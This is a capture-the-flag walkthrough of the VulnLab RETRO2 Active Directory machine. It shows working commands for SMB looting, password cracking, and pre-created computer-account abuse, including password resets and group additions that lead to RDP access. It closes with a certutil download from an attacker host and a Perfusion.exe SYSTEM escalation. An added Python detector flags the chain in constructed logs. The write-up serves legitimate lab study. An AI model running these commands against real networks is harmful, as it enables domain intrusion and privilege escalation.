Where Notes Work
RETRO2 – VULNLAB
This is the Write-up/Walkthrough of the RETRO2 Active Directory Machine from VULNLAB.
Note: The IP differs between some commands because stopping and starting the machine assigns a new IP every time.
NMAP SCAN:
Nmap scan report for retro2.vl (10.10.92.93)
Host is up (0.14s latency).
Not shown: 983 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-22 14:29:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2024-12-22T14:31:17+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2024-08-16T11:25:28
|_Not valid after: 2025-02-15T11:25:28
| rdp-ntlm-info:
| Target_Name: RETRO2
| NetBIOS_Domain_Name: RETRO2
| NetBIOS_Computer_Name: BLN01
| DNS_Domain_Name: retro2.vl
| DNS_Computer_Name: BLN01.retro2.vl
| DNS_Tree_Name: retro2.vl
| Product_Version: 6.1.7601
|_ System_Time: 2024-12-22T14:30:37+00:00
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
Analyzing the nmap report reveals the domain RETRO2.VL. Add the domain together with the IP to the /etc/hosts file.
IP retro2.vl
Listing the SMB shares shows a public share that can be read without credentials; its db directory contains a staff.accdb file. After downloading the file, I found that it is a password-protected MS Access database.
smbclient -L //retro2.vl
smbclient //retro2.vl/public
smb: \> ls
smb: \> cd db
smb: \db\> get staff.accdb
To recover the password of staff.accdb, I used the office2john tool to extract the hash of the protected file and cracked it with john using the rockyou.txt wordlist.
Opening staff.accdb in MS Access and entering that password reveals the credentials of a domain user, ldapreader, whose name indicates that it is probably used only for LDAP queries in the domain.
strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
strUser = "retro2\ldapreader"
strPassword = "pp******"
With the credentials of the ldapreader user, I ran bloodhound-python to collect the domain data for analysis in BloodHound.
bloodhound-python -d retro2.vl --zip -c All -ns 10.10.77.116 -u ldapreader -p 'pp******'
Analyzing the data in BloodHound and looking for the shortest path to Domain Admins reveals the following chain:
- "Domain Computers" have GenericWrite over the ADMWS01$ computer
- The ADMWS01$ computer has AddSelf rights over the Services group
- Members of the Services group have CanRDP rights over the BLN01$ computer, which is the domain controller.
The GenericWrite permission in Active Directory allows a principal to modify all writable attributes of an object, except for properties that require elevated permissions, such as resetting passwords.
- If you have GenericWrite over a user, you can modify the servicePrincipalName attribute, enabling a targeted Kerberoasting attack. (Not easy to crack the password of a machine account)
- If you have GenericWrite over a group, you can add yourself or another principal you control to that group.
- If you have GenericWrite over a computer, you can modify the msDS-KeyCredentialLink attribute. This allows an attacker to create "Shadow Credentials" for the object, enabling authentication as that principal using Kerberos PKINIT. (Not possible here, requires Windows Server 2016)
To abuse GenericWrite, I created a new computer account with impacket-addcomputer and tried targeted Kerberoasting and pywhisker (which requires Windows Server 2016), but nothing worked.
Since this machine is named RETRO2, if you have done the RETRO machine (read blog), you will remember that it used pre-created computer accounts. After listing all computers in the domain, I tried authenticating with netexec as each computer account, using the machine name as the password, and found one computer that returned STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT. This status indicates that the password is correct for the computer account but the account has never been used. You can read more about pre-created computer accounts here.
netexec smb retro2.vl -u fs01$ fs01
After that, I changed the password of the FS01 computer account using impacket-changepasswd over the rpc-samr protocol.
impacket-changepasswd retro2.vl/fs01\$:fs01@retro2.vl -newpass Test@123 -protocol rpc-samr
Since FS01$ (as a member of Domain Computers) has GenericWrite over the ADMWS01$ computer, I could now change the password of the ADMWS01$ machine account as FS01$. Using the net command on Linux, I changed the password of the ADMWS01$ machine account and confirmed it with netexec by authenticating to the SMB server as ADMWS01$ with the new password.
net rpc password 'admws01$' Test@1234 -U retro2.vl/'fs01$'%Test@123 -S 10.10.110.156
Next, looking at BloodHound, observe that the ADMWS01$ machine has two rights (AddSelf and AddMember) over the Services group.
Using AddSelf, ADMWS01$ can add itself to the Services group, and using AddMember it can add any user or computer to the Services group. Using the net command, I added both the ADMWS01$ machine and the ldapreader user to the Services group.
net rpc group addmem "services" admws01$ -U retro2.vl/'admws01$'%Test@1234 -S 10.10.110.156
net rpc group addmem "services" ldapreader -U retro2.vl/'admws01$'%Test@1234 -S 10.10.110.156
Confirm the changes using the following command.
net rpc group members "services" -U retro2.vl/'admws01$'%Test@1234 -S 10.10.110.156
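Every step of this chain (a machine account resetting another machine account's password, then a machine account adding itself and a user to a group) leaves Security log events on the domain controller. The following detection logic is an added example written for this write-up, not part of the original post or any tool it uses; it runs over constructed, simplified events (event IDs 4724 for password resets and 4728/4756 for group membership additions) and flags the steps used above.

```python
"""Flag machine-account abuse matching the FS01$ -> ADMWS01$ -> Services chain.
Added example: constructed Windows Security events, not real log data."""
from dataclasses import dataclass
from typing import List


@dataclass
class Event:
    event_id: int     # Security log event ID (4724 reset / 4728, 4756 group add)
    subject: str      # SubjectUserName: who performed the action
    target: str       # TargetUserName: account (4724) or group (4728/4756)
    member: str = ""  # MemberName for group membership events


def is_machine(name: str) -> bool:
    """Computer (machine) accounts are logged with a trailing '$'."""
    return name.endswith("$")


def detect(events: List[Event]) -> List[str]:
    findings = []
    for e in events:
        subj, tgt, mem = e.subject.lower(), e.target.lower(), e.member.lower()
        # A machine account resetting *another* machine account's password is
        # not normal domain-join behaviour; it is exactly the GenericWrite step.
        if e.event_id == 4724 and is_machine(subj) and is_machine(tgt) and subj != tgt:
            findings.append(f"4724: machine account {subj} reset password of {tgt}")
        # Machine accounts should neither perform group changes (AddSelf/AddMember)
        # nor be added to groups that grant interactive access such as RDP.
        if e.event_id in (4728, 4756):
            if is_machine(subj):
                findings.append(f"{e.event_id}: machine account {subj} added {mem} to {tgt}")
            elif is_machine(mem):
                findings.append(f"{e.event_id}: machine account {mem} added to {tgt} by {subj}")
    return findings


# Constructed sample events mirroring the chain in this write-up (not real logs).
SAMPLE = [
    Event(4724, "Administrator", "FS01$"),                        # benign admin reset
    Event(4724, "FS01$", "ADMWS01$"),                             # GenericWrite abuse
    Event(4728, "ADMWS01$", "Services", member="ADMWS01$"),       # AddSelf
    Event(4728, "ADMWS01$", "Services", member="ldapreader"),     # AddMember
    Event(4728, "Administrator", "Services", member="svc_backup"),  # benign
    Event(4756, "helpdesk", "Remote Desktop Users", member="WS02$"),  # machine added to RDP group
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```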
Now that the ldapreader user is a member of the Services group, and as BloodHound showed that members of the Services group CanRDP into the BLN01 computer, let's connect over RDP as the ldapreader user.
xfreerdp /v:retro2.vl /u:ldapreader /p:pp****** /d:retro2.vl /tls-seclevel:0
After connecting over RDP, I got the user.txt file as proof of the foothold. Looking for the path to root, I checked the VulnLab wiki, which lists a blog link as a hint. After some time I realised that the OS running on the domain controller is badly outdated (Windows Server 2008), and among the blog posts I found one that abuses insecure registry permissions to execute a program as a high-privilege user (NT AUTHORITY\SYSTEM).
To learn more about the vulnerability, please refer to that blog. I then downloaded the exploit from GitHub, compiled it with Visual Studio and transferred it to the domain controller (BLN01) using certutil; you can also use other LOLBAS tools such as bitsadmin.
certutil -urlcache -f http://ATTACKERIP/Perfusion.exe Perfusion.exe
Just run Perfusion.exe on the DC as the ldapreader user, and you will get a new cmd process running with NT AUTHORITY\SYSTEM privileges.
Perfusion.exe -c cmd -i
If you face any problems, let me know in the comment.